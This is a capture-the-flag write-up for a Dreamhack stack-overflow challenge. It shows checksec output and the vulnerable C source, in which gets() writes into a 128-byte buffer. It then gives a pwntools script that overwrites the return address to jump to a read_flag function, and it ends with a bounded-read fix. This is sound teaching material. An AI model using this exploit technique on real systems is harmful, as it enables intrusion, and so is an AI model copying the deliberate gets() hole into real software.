It is a 32-bit ELF.
file basic_exploitation_001
basic_exploitation_001: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=3e59f379d1f0653db81908d1d3a5eb9dce83816f, not stripped
NX is enabled, but since we can overwrite the return address (no canary, no PIE), there is nothing to worry about.
checksec basic_exploitation_001
[*] '/root/dreamhack/basic001/basic_exploitation_001'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Stripped: No
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
puts("TIME OUT");
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(30);
}
void read_flag() {
system("cat /flag");
}
int main(int argc, char *argv[]) {
char buf[0x80];
initialize();
gets(buf);
return 0;
}
read_flag is sitting right there in plain sight.
from pwn import *
r = remote('host3.dreamhack.games', 22166)
payload = b'A' * 132            # 0x80-byte buf + 4 bytes of saved ebp
payload += p32(0x80485b9)       # read_flag
r.sendline(payload)             # gets() only returns once it sees a newline
r.interactive()
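As an added note, not part of the original writeup or the challenge source: the root cause is gets() writing unbounded input into the 128-byte buf, so the fix is a bounded line reader. The helper name read_line_bounded below is my own; it keeps the same 0x80 buffer and drains the tail of an over-long line so the leftover bytes neither spill past buf nor get picked up by the next read.

```c
#include <stdio.h>
#include <string.h>

/* Bounded replacement for gets(): reads one line into buf (capacity n),
 * strips the trailing newline, and discards the rest of any line longer
 * than n-1 bytes so nothing is written past buf. Returns the stored
 * length, or -1 on EOF with no data read. */
long read_line_bounded(char *buf, size_t n, FILE *in) {
    if (n == 0 || fgets(buf, (int)n, in) == NULL)
        return -1;
    size_t len = strcspn(buf, "\n");
    if (buf[len] == '\n') {
        buf[len] = '\0';              /* complete line: drop the newline */
    } else {
        /* no newline stored: the line was truncated (or hit EOF),
         * so consume the remainder up to the next newline */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n') {}
    }
    return (long)len;
}

int main(void) {
    char buf[0x80];                   /* same 128-byte buffer as the challenge */
    if (read_line_bounded(buf, sizeof buf, stdin) < 0)
        return 1;
    printf("stored %zu bytes\n", strlen(buf));
    return 0;
}
```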